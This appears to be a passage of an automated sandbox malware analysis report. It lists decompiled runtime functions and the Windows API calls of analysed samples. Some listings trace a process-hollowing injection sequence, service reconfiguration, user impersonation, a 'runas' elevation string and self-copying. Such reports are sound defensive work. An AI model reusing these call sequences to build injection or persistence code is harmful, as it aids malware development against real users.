                              C-Code - Quality: 100%
                              			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                              				char _v8;
                              				signed int _v12;
                              				char _v20;
                              				char _t43;
                              				char _t46;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				int _t57;
                              				int _t58;
                              				signed short* _t59;
                              				short* _t60;
                              				int _t65;
                              				char* _t72;
                              
                              				_t72 = _a8;
                              				if(_t72 == 0 || _a12 == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					if( *_t72 != 0) {
                              						E0040EC86( &_v20, _a16);
                              						_t43 = _v20;
                              						__eflags =  *(_t43 + 0x14);
                              						if( *(_t43 + 0x14) != 0) {
                              							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                              							__eflags = _t46;
                              							if(_t46 == 0) {
                              								__eflags = _a4;
                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                              								if(__eflags != 0) {
                              									L10:
                              									__eflags = _v8;
                              									if(_v8 != 0) {
                              										_t53 = _v12;
                              										_t11 = _t53 + 0x70;
                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                              										__eflags =  *_t11;
                              									}
                              									return 1;
                              								}
                              								L21:
                              								_t54 = E0040BFC1(__eflags);
                              								 *_t54 = 0x2a;
                              								__eflags = _v8;
                              								if(_v8 != 0) {
                              									_t54 = _v12;
                              									_t33 = _t54 + 0x70;
                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                              									__eflags =  *_t33;
                              								}
                              								return _t54 | 0xffffffff;
                              							}
                              							_t56 = _v20;
                              							_t65 =  *(_t56 + 0xac);
                              							__eflags = _t65 - 1;
                              							if(_t65 <= 1) {
                              								L17:
                              								__eflags = _a12 -  *(_t56 + 0xac);
                              								if(__eflags < 0) {
                              									goto L21;
                              								}
                              								__eflags = _t72[1];
                              								if(__eflags == 0) {
                              									goto L21;
                              								}
                              								L19:
                              								_t57 =  *(_t56 + 0xac);
                              								__eflags = _v8;
                              								if(_v8 == 0) {
                              									return _t57;
                              								}
                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                              								return _t57;
                              							}
                              							__eflags = _a12 - _t65;
                              							if(_a12 < _t65) {
                              								goto L17;
                              							}
                              							__eflags = _a4;
                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                              							__eflags = _t58;
                              							_t56 = _v20;
                              							if(_t58 != 0) {
                              								goto L19;
                              							}
                              							goto L17;
                              						}
                              						_t59 = _a4;
                              						__eflags = _t59;
                              						if(_t59 != 0) {
                              							 *_t59 =  *_t72 & 0x000000ff;
                              						}
                              						goto L10;
                              					} else {
                              						_t60 = _a4;
                              						if(_t60 != 0) {
                              							 *_t60 = 0;
                              						}
                              						goto L5;
                              					}
                              				}
                              			}


















                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                              • __isleadbyte_l.LIBCMT ref: 00415307
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0051553A
                              • __isleadbyte_l.LIBCMT ref: 0051556E
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0051559F
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0051560D
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                              				intOrPtr _t25;
                              				void* _t26;
                              				void* _t28;
                              
                              				_t25 = _a16;
                              				if(_t25 == 0x65 || _t25 == 0x45) {
                              					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                              					goto L9;
                              				} else {
                              					_t34 = _t25 - 0x66;
                              					if(_t25 != 0x66) {
                              						__eflags = _t25 - 0x61;
                              						if(_t25 == 0x61) {
                              							L7:
                              							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                              						} else {
                              							__eflags = _t25 - 0x41;
                              							if(__eflags == 0) {
                              								goto L7;
                              							} else {
                              								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                              							}
                              						}
                              						L9:
                              						return _t26;
                              					} else {
                              						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                              					}
                              				}
                              			}







                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Callgraph

                              [Graph omitted: call relationships among the functions in memory region 00007FF81A110000]

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a111b10, which calls ChangeServiceConfigA]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ChangeConfigService
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: NameUser
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a110c34, which calls OpenServiceA]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: OpenService
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a110b2d, which calls OpenSCManagerW]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a111a1d, which calls ControlService]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ControlService
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a11108a, which calls FindCloseChangeNotification]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Graph omitted: function at 7ff81a111760, which calls ImpersonateLoggedOnUser]
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ImpersonateLoggedUser
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32(0138E000,?,0138A9A0,0138AF26,?,0138E000,0138AF26,0138E000), ref: 0138A9C3
                              • TerminateProcess.KERNEL32(00000000,?,0138A9A0,0138AF26,?,0138E000,0138AF26,0138E000), ref: 0138A9CA
                              • ExitProcess.KERNEL32 ref: 0138A9DC
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01387776), ref: 01387A79
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(013A9708,00000FA0,?,?,01387028), ref: 01387056
                              • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01387028), ref: 01387061
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01387028), ref: 01387072
                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01387084
                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01387092
                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01387028), ref: 013870B5
                              • ___scrt_fastfail.LIBCMT ref: 013870C6
                              • DeleteCriticalSection.KERNEL32(013A9708,00000007,?,?,01387028), ref: 013870D1
                              • CloseHandle.KERNEL32(00000000,?,?,01387028), ref: 013870E1
                              Strings
                              • WakeAllConditionVariable, xrefs: 0138708A
                              • SleepConditionVariableCS, xrefs: 0138707E
                              • kernel32.dll, xrefs: 0138706D
                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0138705C
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                              • API String ID: 3578986977-3242537097
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                                • Part of subcall function 01392368: CreateFileW.KERNELBASE(00000000,00000000,?,01392758,?,?,00000000,?,01392758,00000000,0000000C), ref: 01392385
                              • GetLastError.KERNEL32 ref: 013927C3
                              • __dosmaperr.LIBCMT ref: 013927CA
                              • GetFileType.KERNELBASE(00000000), ref: 013927D6
                              • GetLastError.KERNEL32 ref: 013927E0
                              • __dosmaperr.LIBCMT ref: 013927E9
                              • CloseHandle.KERNEL32(00000000), ref: 01392809
                              • CloseHandle.KERNEL32(0138D4F0), ref: 01392956
                              • GetLastError.KERNEL32 ref: 01392988
                              • __dosmaperr.LIBCMT ref: 0139298F
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,?), ref: 01379C90
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: PathTemp
                              • String ID:
                              • API String ID: 2920410445-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • Sleep.KERNEL32(000003E8), ref: 013742B9
                              • SetCurrentDirectoryA.KERNEL32(00000000,B7E58ED7), ref: 01374364
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CurrentDirectorySleep
                              • String ID: runas
                              • API String ID: 16921501-4000483414
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0137A04D
                              • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0137A068
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0137A1A5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AttributesCopyCreateDirectory
                              • String ID:
                              • API String ID: 210682061-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 01390A5E
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01390ACC
                                • Part of subcall function 01390971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01394B40,?,00000000,00000000), ref: 01390A13
                                • Part of subcall function 0138DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              • _free.LIBCMT ref: 01390ABD
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                              • String ID:
                              • API String ID: 2560199156-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01379EB5
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0137A1A5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CopyModuleName
                              • String ID:
                              • API String ID: 4108865673-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • Concurrency::cancel_current_task.LIBCPMT ref: 01385F53
                              Yara matches
                              Similarity
                              • API ID: Concurrency::cancel_current_task
                              • String ID:
                              • API String ID: 118556049-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • ___std_exception_copy.LIBVCRUNTIME ref: 0137218E
                                • Part of subcall function 01388483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0137216C,?,?,?,0137216C,?,013A6D1C), ref: 013884E3
                              Yara matches
                              Similarity
                              • API ID: ExceptionRaise___std_exception_copy
                              • String ID:
                              • API String ID: 3109751735-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Yara matches
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0138F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0138E0E6,00000001,00000364,00000006,000000FF,?,?,01388272,?), ref: 0138F966
                              • _free.LIBCMT ref: 0138EDC5
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap_free
                              • String ID:
                              • API String ID: 614378929-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0138E0E6,00000001,00000364,00000006,000000FF,?,?,01388272,?), ref: 0138F966
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,00000000,?,01392758,?,?,00000000,?,01392758,00000000,0000000C), ref: 01392385
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013738E6
                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0137394B
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01373964
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0137397F
                              • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 013739A3
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 013739BE
                              • GetProcAddress.KERNEL32(00000000), ref: 013739C5
                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 013739ED
                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01373A0E
                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01373A5A
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01373A96
                              • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01373AB2
                              • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01373ABE
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01373ACC
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01373AED
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                              • String ID: $NtUnmapViewOfSection$ntdll.dll
                              • API String ID: 4033543172-1522589568
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateMutexW.KERNEL32(00000000,00000000,?,013A918C,B7E58ED7,?,00000000,00000000), ref: 01377F61
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 01377F67
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutex
                              • String ID:
                              • API String ID: 1925916568-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Yara matches
                              Similarity
                              • API ID: _free$InformationTimeZone
                              • String ID:
                              • API String ID: 597776487-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01387B12
                              Yara matches
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 01373132
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373147
                              • HeapAlloc.KERNEL32(00000000), ref: 0137314A
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 01373158
                              • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0137317B
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373186
                              • HeapAlloc.KERNEL32(00000000), ref: 01373189
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373199
                              • HeapAlloc.KERNEL32(00000000), ref: 0137319C
                              • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 013731C6
                              • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013731D9
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 013732D5
                              • HeapFree.KERNEL32(00000000), ref: 013732DE
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013732E3
                              • HeapFree.KERNEL32(00000000), ref: 013732E6
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013732ED
                              • HeapFree.KERNEL32(00000000), ref: 013732F0
                              • LocalFree.KERNEL32(00000000), ref: 013732F5
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                              • String ID:
                              • API String ID: 3326663573-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 01391705
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912BB
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912CD
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912DF
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912F1
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391303
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391315
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391327
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391339
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139134B
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139135D
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139136F
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391381
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391393
                              • _free.LIBCMT ref: 013916FA
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0139171C
                              • _free.LIBCMT ref: 01391731
                              • _free.LIBCMT ref: 0139173C
                              • _free.LIBCMT ref: 0139175E
                              • _free.LIBCMT ref: 01391771
